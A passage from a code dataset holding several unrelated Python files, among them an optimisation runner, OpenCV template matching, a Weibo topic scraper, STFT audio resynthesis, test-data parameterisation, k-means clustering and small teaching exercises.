con elitismo)\")\n # [print(e.solutions) for e in entrada]\n # print(\" ###\")\n pool = Pool(processes=3)\n results = [\n pool.apply_async(\n JayaSAMPE.worker, args=(self, x)) for x in entrada]\n subPopulations = [p.get() for p in results]\n\n newPopulation = Population(self.minimax)\n newPopulation.merge(subPopulations)\n # new_best_value = newPopulation.getBestAndWorst()['best_value']\n # old_best_value = self.population.getBestAndWorst()['best_value']\n #\n # if self.minimax:\n # if new_best_value > old_best_value:\n # self.population = newPopulation\n # else:\n # if new_best_value < old_best_value:\n # self.population = newPopulation\n # self.population = newPopulation\n # newPopulation.getBestAndWorst()\n self.population = newPopulation\n\n def run(self, number_iterations):\n result = self.population.getBestAndWorst()\n bestValue = result['best_value']\n m = 2\n for i in range(number_iterations):\n # print(i, self.population.solutions)\n if i == 0:\n # print(\"Generaring\", m)\n self.generate(2)\n else:\n if self.minimax:\n bV = self.population.getBestAndWorst()['best_value']\n if bV > bestValue:\n if m < self.numSolutions:\n m += 1\n bestValue = bV\n elif m > 2:\n m -= 1\n else:\n bV = self.population.getBestAndWorst()['best_value']\n if bV < bestValue:\n if m <= self.numSolutions:\n m += 1\n bestValue = bV\n elif m > 2:\n m -= 1\n # print(\"Generaring\", m)\n self.generate(m)\n # print(\"done\", m)\n return self.population.getBestAndWorst()\n","sub_path":"pyjaya/sampemultiprocess.py","file_name":"sampemultiprocess.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"379373952","text":"def fib(n):\n if n <= 2:\n return n\n else:\n return fib(n - 1) + fib(n - 2)\n\n\ndef input_validation():\n while True:\n n = int(input(\"Input a int number: \"))\n if n < 0:\n print(\"The number must be non-negative\")\n continue\n print(\"The result is:\", fib(n))\n break\n\n\nwhile True:\n try:\n input_validation()\n break\n except ValueError:\n print(\"The number must be an 
integer\")\n","sub_path":"students/ryba_paula/lesson_03_functions/fibonacci_numbers.py","file_name":"fibonacci_numbers.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"527936838","text":"import os\nimport numpy as np\nimport imutils\nimport glob\nimport cv2\nimport cv2 as cv\nfrom enum import Enum\nfrom plot_helper import plot_helper as plt\nimport matplotlib.pyplot as plt2\n\n\nclass img_helper:\n\n\t@staticmethod \n\tdef find_scaled_path(template_path, img_path, match_bounds = [[0,0],[0,0]], min_scale = 0.1, max_scale = 2.0, steps = 40, show_progress = False):\n\t\tcv_template = cv.imread(template_path)\n\t\tcv_image = cv.imread(img_path)\n\t\treturn img_helper.find_scaled(cv_template, cv_image, match_bounds, min_scale, max_scale, steps, show_progress)\n\t\n\t@staticmethod\t\n\tdef find_scaled(cv_template, cv_image, match_bounds, min_scale = 0.1, max_scale = 2.0, steps = 40, show_progress = False):\n\t\ttemplate = cv_template\n\t\ttemplate = cv.cvtColor(template, cv.COLOR_BGR2GRAY)\n\t\ttemplate = cv.Canny(template, 50, 200)\n\t\tplt.show_bgr(template)\n\t\t(tH, tW) = template.shape[:2]\t\t\n\t\timage = cv_image\t\t\n\t\tgray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\t\tfound = None\n\t\t# loop over the scales of the image\n\t\tfor scale in np.linspace(min_scale, max_scale, steps)[::-1]:\n\t\t\t# resize the image according to the scale, and keep track\n\t\t\t# of the ratio of the resizing\n\t\t\tresized = imutils.resize(gray, width = int(gray.shape[1] * scale))\n\t\t\tr = gray.shape[1] / float(resized.shape[1])\n\t\t\t# if the resized image is smaller than the template, then break\n\t\t\t# from the loop\n\t\t\tif resized.shape[0] < tH or resized.shape[1] < tW:\n\t\t\t\tbreak\n\t\t\tedged = cv.Canny(resized, 50, 200)\t\t\t\n\t\t\tresult = cv.matchTemplate(edged, template, cv.TM_CCOEFF)\n\t\t\t(_, maxVal, _, maxLoc) = cv.minMaxLoc(result)\n\t\t\t# check to see if the iteration should be visualized\n\t\t\tif show_progress:\n\t\t\t\t# draw a bounding box around the detected region\n\t\t\t\tclone = np.dstack([edged, edged, edged])\n\t\t\t\tcv.rectangle(clone, (maxLoc[0], maxLoc[1]),\n\t\t\t\t\t(maxLoc[0] + tW, maxLoc[1] + tH), (0, 0, 255), 2)\n\t\t\t\tcv.imshow(\"Visualize\", clone)\n\t\t\t\tcv.waitKey(0)\n\t\t\t# if we have found a new maximum correlation value, then update\n\t\t\t# the bookkeeping variable\t\t\t\n\t\t\tif found is None or maxVal > found[0]:\n\t\t\t\tprint(maxLoc)\n\t\t\t\tprint(r)\n\t\t\t\tmaxMatch = imutils.resize(image, width = int(image.shape[1] * scale))[maxLoc[1]+match_bounds[0][1]:maxLoc[1]+tH+match_bounds[1][1],maxLoc[0]+match_bounds[0][0]:maxLoc[0]+tW+match_bounds[1][0]]\t\t\t\t\n\t\t\t\tfound = (maxVal, maxLoc, r, maxMatch)\n\t\t# unpack the bookkeeping variable and compute the (x, y) coordinates\n\t\t# of the bounding box based on the resized ratio\n\t\t(_, maxLoc, r, match) = found\n\t\t(startX, startY) = (int(maxLoc[0] * r), int(maxLoc[1] * r))\n\t\t(endX, endY) = (int((maxLoc[0] + tW) * r), int((maxLoc[1] + tH) * r))\n\t\tprint(found)\n\t\t# draw a bounding box around the detected result and display the image\n\t\tcv.rectangle(image, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\tplt.show_bgr(image)\n\t\treturn startX, startY, endX, endY, r, match\n\t\n\n\t@staticmethod\n\tdef find(cv_template, cv_image):\n\t\ttemplate = cv.cvtColor(cv_template, cv.COLOR_BGR2GRAY) \n\t\ttemplate = cv.Canny(cv_template, 50, 200) \t\t\n\t\tedged = cv.cvtColor(cv_image, 
cv.COLOR_BGR2GRAY)\n\t\tedged = cv.Canny(cv_image, 50, 200)\t\t\n\t\tresult = cv.matchTemplate(edged, template, cv.TM_CCOEFF)\n\t\t(_, maxVal, _, maxLoc)= cv.minMaxLoc(result)\n\t\treturn maxVal, maxLoc\n\n\t@staticmethod\n\tdef find_best_match(dir, cv_image):\t\t\n\t\tfound = None\n\t\tfor filename in os.listdir(dir):\t\t\t\t\t\t \n\t\t\ttemplate_path = os.path.join(dir, filename)\n\t\t\ttemplate = cv.imread(template_path)\t\t\t\n\t\t\t(maxVal, maxLoc) = img_helper.find(template, cv_image)\n\t\t\tprint(f'{filename} : {maxVal}')\n\t\t\tif found == None or maxVal>found[0]:\n\t\t\t\tfound = (maxVal, maxLoc, filename)\n\t\treturn filename, maxVal\n\n\tdef find_first_match(dir, cv_image, threshold):\n\t\tfor filename in os.listdir(dir):\t\t\t\t\t\t \n\t\t\ttemplate_path = os.path.join(dir, filename)\n\t\t\ttemplate = cv.imread(template_path)\n\t\t\t(maxVal, maxLoc) = img_helper.find(template, cv_image)\n\t\t\tif (maxVal > threshold):\n\t\t\t\treturn filename\n\t\treturn None\n\n\tdef find_bf(cv_template, cv_image):\n # Initiate SIFT detector\n\t\tsift = cv.SIFT_create()\n\t\t# find the keypoints and descriptors with SIFT\n\t\tkp1, des1 = sift.detectAndCompute(cv_template, None)\n\t\tkp2, des2 = sift.detectAndCompute(cv_image, None)\n\t\t# BFMatcher with default params\n\t\tbf = cv.BFMatcher()\n\t\tbf = cv.BFMatcher()\n\t\tmatches = bf.knnMatch(des1,des2,k=2)\n\t\t# Apply ratio test\n\t\tgood = []\n\t\tfor m,n in matches:\n\t\t\tif m.distance < 0.95*n.distance:\n\t\t\t\tgood.append([m])\n\t\t# cv.drawMatchesKnn expects list of lists as matches.\n\t\timg3 = cv.drawMatchesKnn(cv_template,kp1,cv_image,kp2,good,None,flags=cv.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n\t\tplt2.imshow(img3),plt2.show()\n\t\treturn len(good)\n\n\n\t\t#matches = bf.knnMatch(des1, des2, k=2)\n\t\t## Apply ratio test\n\t\t#good = []\n\t\t#for m,n in matches:\n\t\t#\tif m.distance < 0.75*n.distance:\n\t\t#\t\tgood.append([m])\n\t\t## cv.drawMatchesKnn expects list of lists as matches.\n\t\t#img3 = cv.drawMatchesKnn(cv_template,kp1,cv_image,kp2,good,None,flags=cv.DrawMatchesFlags_NOT_DRAW_SINGLE_POINTS)\n\t\t#plt2.imshow(img3),plt2.show()\n\t\treturn None\n\n\tdef find_best_match_bf(dir, cv_image):\t\t\n\t\tfound = None\n\t\tfor filename in os.listdir(dir):\t\t\t\t\t\t \n\t\t\ttemplate_path = os.path.join(dir, filename)\n\t\t\ttemplate = cv.imread(template_path)\t\t\t\n\t\t\tmaxVal = 1\n\t\t\tmatches = img_helper.find_bf(template, cv_image)\n\t\t\tif found == None or matches > found[0]:\n\t\t\t\tfound = (matches, filename)\n\t\t\t\n\t\treturn found\n\n\t@staticmethod\n\tdef match_with_alpha(cv_template, cv_image, cv_template_alpha):\n\t\timg = cv_image\t\t\n\t\ttempl = cv_template\n\t\t(tH, tW) = templ.shape[:2]\n\t\tchannels = cv.split(cv_template_alpha)\n\t\t#extract \"transparency\" channel from image\n\t\talpha_channel = np.array(channels[3]) \n\t\t#generate mask image, all black dots will be ignored during matching\n\t\tmask = cv.merge([alpha_channel,alpha_channel,alpha_channel])\n\t\tcv.imshow(\"Mask\", mask)\n\n\t\tresult = cv.matchTemplate(img, templ, cv.TM_CCORR_NORMED, None, mask)\n\t\t#cv.imshow(\"Matching with mask\", result)\n\t\tmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\n\t\tprint('Highest correlation WITH mask', max_val)\n\t\t(startX, startY) = (int(max_loc[0]), int(max_loc[1]))\n\t\t(endX, endY) = (int((max_loc[0] + tW)), int((max_loc[1] + tH)))\n\t\tcv.rectangle(img, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\tplt.show_bgr(img)\n\t\tresult = cv.matchTemplate(img, templ, 
cv.TM_CCORR_NORMED)\n\t\t#cv.imshow(\"Matching without mask\", result)\n\t\tmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\n\t\tprint('Highest correlation without mask', max_val)\n\t\t(startX, startY) = (int(max_loc[0]), int(max_loc[1]))\n\t\t(endX, endY) = (int((max_loc[0] + tW)), int((max_loc[1] + tH)))\n\t\tcv.rectangle(img, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\tplt.show_bgr(img)\n\n\t@staticmethod\n\tdef match_with_mask(cv_template, cv_image):\n\t\timg = cv_image\t\t\n\t\ttempl = cv_template\t\n\n\t\t(tH, tW) = templ.shape[:2]\n\t\tresult = cv.matchTemplate(img, templ, cv.TM_CCORR_NORMED, None, templ)\t\t\n\t\tmin_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\n\t\tprint('Highest correlation WITH mask', max_val)\n\t\t(startX, startY) = (int(max_loc[0] ), int(max_loc[1] ))\n\t\t(endX, endY) = (int((max_loc[0] + tW) ), int((max_loc[1] + tH) ))\n\t\t#cv.rectangle(img, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\t#plt.show_bgr(img)\n\n\t\t#result = cv.matchTemplate(img, templ, cv.TM_CCORR_NORMED)\t\t\n\t\t#min_val, max_val, min_loc, max_loc = cv.minMaxLoc(result)\n\t\t#(startX, startY) = (int(max_loc[0] ), int(max_loc[1] ))\n\t\t#(endX, endY) = (int((max_loc[0] + tW) ), int((max_loc[1] + tH) ))\n\t\t#print('Highest correlation without mask', max_val)\n\t\t#cv.rectangle(img, (startX, startY), (endX, endY), (0, 0, 255), 2)\t\t\n\t\t#plt.show_bgr(img)\n","sub_path":"img_helper.py","file_name":"img_helper.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"158004325","text":"import re\nfrom scripts.handle_mysql import HandleMysql\nfrom scripts.handle_yaml import HandleYaml\nfrom scripts.handle_path import USER_ACCOUNT_FILE_PATH\n\n\nclass Parameterize:\n '''\n 参数化\n '''\n not_existed_tel_pattern = r'{not_existed_tel}' # 未注册的手机号\n not_existed_id_pattern = r'{not_existed_id}' # 不存在的id\n\n invest_user_tel_pattern = r'{invest_user_tel}' # 投资人的手机号\n invest_user_pwd_pattern = r'{invest_user_pwd}' # 投资人的密码\n invest_user_id_pattern = r'invest_user_id' # 投资人的id\n\n # 借款人的相关正则表达式\n borrow_user_id_pattern = r'{borrow_user_id}' # 借款用户id\n borrow_user_tel_pattern = r'{borrow_user_tel}' # 借款用户手机号\n borrow_user_pwd_pattern = r'{borrow_user_pwd}' # 借款人密码\n\n loan_id_pattern = r'{loan_id}'\n do_user_account = HandleYaml(USER_ACCOUNT_FILE_PATH)\n\n @classmethod\n def not_existed_replace(cls, data):\n do_mysql = HandleMysql()\n # 不存在手机号的参数化\n if cls.not_existed_tel_pattern in data: # 使用成员运算\n data = re.sub(cls.not_existed_tel_pattern, do_mysql.create_not_existed_mobile(), data)\n\n # 不存在的用户id替换\n if re.search(cls.not_existed_id_pattern, data):\n sql = \"SELECT id FROM member ORDER BY id DESC limit 0, 1;\"\n not_existed_id = do_mysql.run(sql).get('id') + 1 # 获取最 大的id加1\n data = re.sub(cls.not_existed_id_pattern, str(not_existed_id), data)\n\n # loan_id 替换\n if re.search(cls.loan_id_pattern, data):\n loan_id = getattr(cls, 'loan_id')\n data = re.sub(cls.loan_id_pattern, str(loan_id), data)\n do_mysql.close()\n return data\n\n @classmethod\n def invest_user_replace(cls, data):\n # 参数化投资人的id\n if re.search(cls.invest_user_id_pattern, data):\n invest_user_id = cls.do_user_account.read('invest', 'id')\n data = re.sub(cls.invest_user_id_pattern, str(invest_user_id), data)\n # 注册用户手机号的参数化\n if re.search(cls.invest_user_tel_pattern, data):\n invest_user_tel = cls.do_user_account.read('invest', 'mobile_phone')\n data = re.sub(cls.invest_user_tel_pattern, invest_user_tel, 
data)\n\n        # 注册用户密码的参数化\n        if re.search(cls.invest_user_pwd_pattern, data):\n            invest_user_pwd = cls.do_user_account.read('invest', 'pwd')\n            data = re.sub(cls.invest_user_pwd_pattern, invest_user_pwd, data)\n        return data\n\n    @classmethod\n    def borrow_user_replace(cls, data):\n        return data\n        # 借款人的相关替换\n\n    @classmethod\n    def admin_user_replace(cls, data):\n        # 管理员相关的替换\n        return data\n\n    @classmethod\n    def other_replace(cls, data):\n        # 其他相关的替换\n        return data\n\n    @classmethod\n    def to_param(cls, data):\n        data = cls.not_existed_replace(data)\n        data = cls.admin_user_replace(data)\n        data = cls.borrow_user_replace(data)\n        data = cls.other_replace(data)\n        data = cls.invest_user_replace(data)\n        return data\n\n\nif __name__ == '__main__':\n    # 注册接口参数化\n    one_str = {\"mobile_phone\": \"{not_existed_tel}\", \"pwd\": \"12345678\", \"type\": 1, \"reg_name\": \"keyou\"}\n    print(Parameterize.to_param(one_str))\n","sub_path":"scripts/handle_parameterize_optimize.py","file_name":"handle_parameterize_optimize.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"614133053","text":"class Employee:\r\n    'Employee class this for more information'\r\n\r\n    def setName(self, name):\r\n        'sets the name in the object'\r\n        self.name = name\r\n        return\r\n    \r\n    def printname(self):\r\n        'prints the name from the object'\r\n        print(self.name) \r\n        return\r\n\r\ndef main():\r\n    emp = Employee()\r\n    emp1 = Employee()\r\n    emp.setName('sdfsd')\r\n\r\n    #Employee.setName(emp, 'asdas')\r\n    #Employee.setName(emp1, 'asdas')\r\n\r\n    #emp.setName('sdf')\r\n    #print(emp.__dir__)\r\n    #emp.setName('stalin')\r\n    #emp.printname() __\r\n\r\n    #print(type(emp))\r\n    #print(dir(emp))\r\n\r\nmain()","sub_path":"OOPS/simpleClass.py","file_name":"simpleClass.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"180058841","text":"import requests\nimport json\nimport configparser\nimport time\nfrom bs4 import BeautifulSoup\n\n\ndef get_topic(_headers, _params):\n    \"\"\"\nhttps://m.weibo.cn/container/getIndex\n    :param _params:\"\"\n    :param _url:\"https://m.weibo.cn/p/index?containerid=xxx&extparam=xxx&luicode=xxx&lfid=xxx\"\n    :return:\n    \"\"\"\n    _page = dict()\n    retry = 3\n    _page[\"success\"] = False\n    while retry > 0:\n        resp = requests.get(\"https://m.weibo.cn/container/getIndex\", params=_params, headers=_headers)\n        if resp.status_code == 200:\n            break\n        else:\n            retry -= 1\n            continue\n\n    _page[\"status_code\"] = resp.status_code\n    _page[\"reason\"] = resp.reason\n    if resp.status_code != 200:\n        return _page\n    jss = json.loads(resp.content.decode(\"utf-8\"), \"utf-8\")\n\n    if jss[\"ok\"] != 1:\n        _page[\"success\"] = False\n        print(\"get topic failed:\")\n        print(\"detail message:\")\n        print(jss)\n        return _page\n    _page[\"success\"] = True\n    cards = jss[\"cards\"]\n\n    _page[\"since_id\"] = jss[\"pageInfo\"][\"since_id\"]\n\n    blogs = []\n    _page[\"blogs\"] = blogs\n    for card in cards:\n        for it in card[\"card_group\"]:\n            try:\n                if it[\"card_type\"] == 9:\n                    mblog = it[\"mblog\"]\n                    blog = dict()\n                    blog[\"_id\"] = mblog[\"bid\"]\n                    blog[\"bid\"] = mblog[\"bid\"]\n                    blog[\"html_text\"] = mblog[\"text\"]\n                    blog[\"plain_text\"] = BeautifulSoup(mblog[\"text\"], \"html.parser\").get_text()\n                    user = dict(username=mblog[\"user\"][\"screen_name\"], uid=mblog[\"user\"][\"id\"])\n                    blog[\"user\"] = user\n                    blog[\"reposts_count\"] = mblog[\"reposts_count\"]\n                    blog[\"comments_count\"] = 
mblog[\"comments_count\"]\n blog[\"attitudes_count\"] = mblog[\"attitudes_count\"]\n blog[\"time\"] = mblog[\"created_at\"]\n blog[\"type\"] = -1\n blog[\"comments\"] = list()\n\n blog[\"load_info\"] = dict(load_comment=\"N\", load_time=time.time())\n blogs.append(blog)\n\n except KeyError as e:\n print(\"parse json item error:\")\n print(e)\n if len(_page[\"blogs\"]) == 0:\n _page[\"success\"] = False\n return _page\n","sub_path":"crawer_topic2.py","file_name":"crawer_topic2.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"27256249","text":"# -*- coding: utf-8 -*-\nfrom scipy import arange, hamming, sin, pi\nfrom scipy.fftpack import fft, ifft\nfrom matplotlib import pylab as plt\n\nfrom scipy import signal\n\nimport scipy.io.wavfile\nimport numpy as np\n\nimport wave\n\ndef wavfilename_format(fname):\n import os.path\n file_name = fname\n name, ext = os.path.splitext(fname)\n if ext != '.wav':\n file_name = fname + '.wav'\n return file_name\n\ndef save_as_wav(resyn_sig, filename):\n # 2 ** 16 / 2\n # 32768.0\n # wavef=wavedata[1]*(1.0/32768.0) # pcm\n resyn_data = (resyn_sig * 32768.0).astype(np.int16)\n scipy.io.wavfile.write(filename, samplerate, resyn_data)\n\n# it seems to have something wrong 17-05-30 rild\n# solved: it was just because of two other instance ... つらい\n# ref: http://introcs.cs.princeton.edu/python/code/stdaudio.py.html\n# import array\ndef save_wav(resyn_sig, filename):\n # resyn_sig = (resyn_sig * 32768)\n\n resyn_sig = resyn_sig * float(0x7fff) # Why is this necessary? 06-01 rild\n # 0x7fff seems to mean 2 ** 16\n\n samples = np.array(resyn_sig, np.int16)\n\n filename = wavfilename_format(filename)\n w = wave.Wave_write(filename)\n w.setnchannels(1)\n w.setsampwidth(2) # 2 bytes\n w.setframerate(samplerate)\n w.setnframes(len(samples))\n w.setcomptype('NONE', 'descrip') # No compression\n\n w.writeframes(samples.tostring())\n w.close()\n\n\ndef save_spec(x, fs, new_filename='non'):\n # matplotlib.imshowではextentを指定して軸を決められます。aspect=\"auto\"で適切なサイズ比になります\n f, t, Sxx = signal.spectrogram(x, fs)\n plt.pcolormesh(t, f, Sxx)\n plt.xlabel(\"time[s]\")\n plt.ylabel(\"frequency[Hz]\")\n plt.colorbar()\n if new_filename != 'non':\n plt.savefig(new_filename)\n\noutput_files_path = \"out/\"\nfilename = \"res/hanekawa_nandemoha01.wav\"\n\ntag = \"stft\"\nscale = 'log' # 'normal', 'log'\npart = 'all' # or int val, less than t.shape (time steps)\nNFFT = 512 # scipy.signal.stft Defaults to 256.\n# 512 is likely to draw the best spectrogram\n# if making 'nperseg' bigger, Zxx.shape become (freqs:decrease, times:increase)\n# Zxx[0], freqs, about half of 'nperseg', rild 06-05\n\nimport pickle\n\ndef loader(filename):\n with open(filename, 'rb') as f:\n obj = pickle.load(f)\n return obj\n\nfname = 'hanekawa_nandemoha01'\n\nrpath = 'pkls/'\nt_filename = rpath + fname + '_t.pickle'\nf_filename = rpath + fname + '_f.pickle'\nZxxC_filename = rpath + 'generated' + 'ZxxC.pickle'\n\ndef stft_data_loader(ffile, tfile, Zxxfile):\n f = loader(ffile)\n t = loader(tfile)\n Zxx = loader(Zxxfile)\n return f, t, Zxx\n\nf, t, Zxx = stft_data_loader(f_filename,\n t_filename,\n ZxxC_filename)\nprint(f.shape)\nprint(t.shape)\nprint(Zxx.shape)\n\nsamplerate = 48000\n_, xrec = signal.istft(Zxx, samplerate)\n\n\nresyn_sig = xrec\nnew_filename = 'kmeans_center_gen'\nsave_wav(resyn_sig, output_files_path + new_filename + \".wav\")\n\nif part != 'all':\n _t = t[:part]\n _Zxx = Zxx[:, :part]\n plt.pcolormesh(_t, 
f, np.log(np.abs(_Zxx) ** 2)) # log scale\nelif scale == 'log':\n plt.pcolormesh(t, f, np.log(np.abs(Zxx) ** 2)) # log scale\nelif scale == 'normal':\n plt.pcolormesh(t, f, np.abs(Zxx), vmin=0, vmax=np.abs(Zxx).max()) # normal scale\n\nplt.title('STFT Magnitude')\nplt.ylabel('Frequency [Hz]')\nplt.xlabel('Time [sec]')\nplt.savefig(output_files_path + new_filename + \".png\")\n# plt.show()\n\n# save_spec(sig, samplerate, new_filename + \".png\")\nexit(0)\n\n'''\nrild's memo \n\n# Reference\n## scipy.signal.stft\nhttps://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.stft.html\n\n### code reading\nABST: It seems to be normal fft transform for me. \n\ndependence \nstft - _spectral_helper - _fft_helper\n \n#### _fft_helper memo \nwindowed fft: fft.pack (twosided) or np.fft.rfft (onesided) \nreturn freqs, time, result \n- 'freqs' seems to be difference phase proceduct from 'result'\n\n## scipy.signal.istft\nhttps://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.istft.html#scipy.signal.istft\n\n\n## plt.pcolormesh\n\nhttps://matplotlib.org/api/pyplot_api.html\nhttps://matplotlib.org/examples/pylab_examples/pcolor_demo.html\n\n## numpy array, get row column \nhttp://qiita.com/supersaiakujin/items/d63c73bb7b5aac43898a#%E5%88%97%E3%82%92%E6%8A%BD%E5%87%BA%E3%81%99%E3%82%8B \n\n---\n# Unused \n## scipy.signal.spectrogram\nhttps://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.spectrogram.html\n'''\n\n","sub_path":"clustering/center_gen.py","file_name":"center_gen.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"625748057","text":"from .apps import ditto_apps\nfrom ..flickr import app_settings\n\n\ndef ditto(request):\n # Get the name of the current page from the url conf.\n # So we can tell which page we're on in the templates.\n url_name = False\n if request.resolver_match:\n url_name = request.resolver_match.url_name\n\n return {\n 'url_name': url_name,\n 'enabled_apps': ditto_apps.enabled(),\n 'DITTO_FLICKR_USE_LOCAL_MEDIA':\n app_settings.DITTO_FLICKR_USE_LOCAL_MEDIA,\n }\n\n","sub_path":"ditto/core/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"323107449","text":"from django.shortcuts import render\n\n\ndef homepage(request):\n return render(request, 'homepage.html')\n\n\ndef count(request):\n mytext = request.GET['q']\n mytextlist = mytext.split()\n length = len(mytextlist)\n myworddict = {}\n for word in mytextlist:\n if word in myworddict:\n myworddict[word] += 1\n else:\n myworddict[word] = 1\n return render(request, 'count.html', {\"worddict\": myworddict.items(), \"length\": length})","sub_path":"wordcount/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"273047587","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : emmanuelgonzalez\nDate : 2020-01-29\nPurpose: Accepts exactly two positions and determines if vowel is present in the word. 
\n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\n\n# --------------------------------------------------\ndef get_args():\n    \"\"\"Get command-line arguments\"\"\"\n\n    parser = argparse.ArgumentParser(\n        description='Find position of vowel in string',\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n    parser.add_argument('vowel',\n                        metavar='vowel',\n                        help='A vowel to look for',\n                        choices=['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'])\n\n    parser.add_argument('text',\n                        metavar='text',\n                        help='The text to search')\n    \n    return parser.parse_args()\n\n# --------------------------------------------------\ndef main():\n    \"\"\"Make a jazz noise here\"\"\"\n\n    args = get_args()\n    vowel = args.vowel\n    text = args.text\n    \n    if vowel.casefold() in text.casefold():\n        index = text.casefold().find(vowel.casefold())\n        print(f'Found \"{vowel}\" in \"{text}\" at index {index}.')\n    else:\n        print(f'\"{vowel}\" is not found in \"{text}\".')\n\n# --------------------------------------------------\nif __name__ == '__main__':\n    main()\n","sub_path":"assignments/01_strings/vpos.py","file_name":"vpos.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"322490659","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 9. naloga\n# Source:\n# https://towardsdatascience.com/understanding-k-means-clustering-in-machine-learning-6a6e67336aa1\n# https://scikit-learn.org/stable/auto_examples/cluster/plot_kmeans_digits.html#sphx-glr-auto-examples-cluster-plot-kmeans-digits-py\n\n\n# In[4]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ndata = pd.read_csv(\"data/clu/124.csv\") \n\ndata\nX = data.values\n\n\n# In[56]:\n\n\ncentroids = np.array([[44,5],[79,-38]])\ncentroids\n\n\n# In[57]:\n\n\nplt.scatter(X[ : , 0], X[ : , 1], c='b')\nplt.scatter(centroids[0][0], centroids[0][1], s=200, c='g', marker='s')\nplt.scatter(centroids[1][0], centroids[1][1], s=200, c='r', marker='s')\nplt.show()\n\n\n# In[50]:\n\n\nKmean = KMeans(n_clusters=2, max_iter=100, init=centroids, n_init=1)\nKmean.fit(data)\nKmean.cluster_centers_\n\n\n# In[48]:\n\n\nfirst = Kmean.cluster_centers_[0]\nsecond = Kmean.cluster_centers_[1]\nKmean.n_iter_\nfirst\nsecond\n\n\n# In[49]:\n\n\nplt.scatter(X[ : , 0], X[ : , 1], s =50, c='b')\nplt.scatter(first[0], first[1], s=200, c='g', marker='s')\nplt.scatter(second[0], second[1], s=200, c='r', marker='s')\nplt.show()\n\n\n# In[51]:\n\n\nKmean.labels_\n\n\n# In[53]:\n\n\nimport collections\ncollections.Counter(Kmean.labels_)\n\n\n# In[55]:\n\n\n# primer napovedovanja/klasifikacije točke\nsample_test=np.array([-3.0,-3.0])\nsecond_test=sample_test.reshape(1, -1)\nKmean.predict(second_test)\n\n","sub_path":"domace_naloge/dn02/postopkiPY/ninth.py","file_name":"ninth.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"610632081","text":"\"\"\"\nExample showing how to open a connection in demo mode.\n\"\"\"\n\n# this \"if\" statement is used so that Sphinx does not execute this script when the docs are being built\nif __name__ == '__main__':\n    from msl.equipment import Config\n    from msl.examples.equipment import EXAMPLES_DIR\n\n    # load the database\n    cfg = Config(EXAMPLES_DIR + '/example2.xml')\n    dbase = cfg.database()\n\n    # get a specific equipment record (a DMM from 
Agilent) from the database and\n # then connect to this DMM in demo mode to send some messages to it\n dmm_record = dbase.records(manufacturer='Agilent', serial=\"537179\")[0]\n dmm = dmm_record.connect(demo=True)\n print(dmm.query('*IDN?'))\n","sub_path":"msl/examples/equipment/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"207465557","text":"import sys\nimport numpy as np\nfrom mpi4py import MPI\n\nfrom pySDC.helpers.stats_helper import get_sorted\n\nfrom pySDC.implementations.controller_classes.controller_MPI import controller_MPI\nfrom pySDC.implementations.sweeper_classes.imex_1st_order import imex_1st_order\n\nfrom pySDC.playgrounds.pmesh.AllenCahn_PMESH_NEW import allencahn_imex, allencahn_imex_stab\nfrom pySDC.playgrounds.pmesh.TransferMesh_PMESH_NEW import pmesh_to_pmesh\nfrom pySDC.playgrounds.pmesh.AllenCahn_dump_NEW import dump\n\n\ndef run_simulation(name=''):\n \"\"\"\n A simple test program to do PFASST runs for the AC equation\n \"\"\"\n\n # set MPI communicator\n comm = MPI.COMM_WORLD\n\n world_rank = comm.Get_rank()\n world_size = comm.Get_size()\n\n # split world communicator to create space-communicators\n if len(sys.argv) >= 2:\n color = int(world_rank / int(sys.argv[1]))\n else:\n color = int(world_rank / 1)\n space_comm = comm.Split(color=color)\n # space_size = space_comm.Get_size()\n space_rank = 